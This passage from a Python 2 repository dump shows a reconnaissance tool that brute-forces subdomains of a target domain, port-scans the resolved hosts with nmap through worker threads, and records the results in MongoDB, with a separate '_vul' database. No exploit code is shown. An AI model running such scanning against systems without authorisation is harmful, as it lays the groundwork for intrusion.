pass 78 | except: 79 | self.db.update({'ip': ip}, {"$set" : {'isup' : 0 }}) 80 | temp = dict( 81 | portinfo = result 82 | ) 83 | self.db.update({'ip': ip}, {"$set" : {'status' : 2}}) 84 | self.db.update({'ip': ip}, {"$set" : temp}) 85 | 86 | self.lock.acquire() 87 | self.thread_count -= 1 88 | self.lock.release() 89 | def run(self): 90 | self.g_lock.acquire() 91 | self._queuesetup() 92 | for i in range(self.threads_num): 93 | t = threading.Thread(target=self._startnmap, name=str(i)) 94 | t.setDaemon(True) 95 | t.start() 96 | while 1: 97 | if self.thread_count > 1: 98 | try: 99 | time.sleep(1.0) 100 | except KeyboardInterrupt,e: 101 | msg = '[WARNING] User aborted, wait all slave threads to exit...' 102 | sys.stdout.write('\r' + msg + '\n\r') 103 | sys.stdout.flush() 104 | self.STOP_ME = True 105 | if self.thread_count == 0: 106 | self.g_lock.release() 107 | break 108 | -------------------------------------------------------------------------------- /lib/portscan.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jax777/portscan/9e4f4fdea383a768534e90805013a1a41e85aa7d/lib/portscan.pyc -------------------------------------------------------------------------------- /require.sh: -------------------------------------------------------------------------------- 1 | apt-get install -y python-dev 2 | apt-get install -y nmap 3 | pip install paramiko 4 | apt-get install -y python2.7-mysqldb 5 | pip install dnspython 6 | pip install pymongo 7 | pip install python-nmap 8 | apt-get install -y freetds-dev 9 | pip install pymssql 10 | pip install redis 11 | pip install python-memcached 12 | -------------------------------------------------------------------------------- /scan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- encoding: utf-8 -*- 3 | # __author__ jax777 4 | import sys 5 | import optparse 6 | from lib.dnstask import Dnstask 7 | from lib.iplist import * 8 | from lib.portscan import * 9 | from lib.mongodb import * 10 | import threading 11 | 12 | def is_intranet(ip): #内网ip 判断 13 | ret = ip.split('.') 14 | if not len(ret) == 4: 15 | return 1 16 | if ret[0] == '10': 17 | return 1 18 | if ret[0] == '172' and 16 <= int(ret[1]) <= 32: 19 | return 1 20 | if ret[0] == '192' and ret[1] == '168': 21 | return 1 22 | return 0 23 | 24 | 25 | if __name__ == '__main__': 26 | parser = optparse.OptionParser('usage: %prog [options] target.com') 27 | parser.add_option('-t', '--threads', dest='threads_num', 28 | default=30, type='int', 29 | help='Number of threads. default = 30') 30 | parser.add_option('-f', '--file', dest='names_file', default='subnames.txt', 31 | type='string', help='Dict file used to brute sub names') 32 | (options, args) = parser.parse_args() 33 | if len(args) < 1: 34 | parser.print_help() 35 | sys.exit(0) 36 | target=args[0] 37 | mongodb = Mongodb(db_info,target) 38 | Wdb = Mongodb(db_info,target+"_vul") 39 | g_lock = threading.Lock() 40 | d = Dnstask(target=target, names_file=options.names_file, 41 | threads_num=options.threads_num,mongodb = mongodb,g_lock =g_lock 42 | ) 43 | d.run() 44 | g_lock.acquire() 45 | print "list all ip \n" 46 | lsip(mongodb) 47 | g_lock.release() 48 | print "start portscan \n" 49 | p = Portscan(threads_num=options.threads_num,mongodb = mongodb,g_lock =g_lock,Wdb = Wdb) 50 | p.run() 51 | g_lock.acquire() 52 | print "task over \n" 53 | --------------------------------------------------------------------------------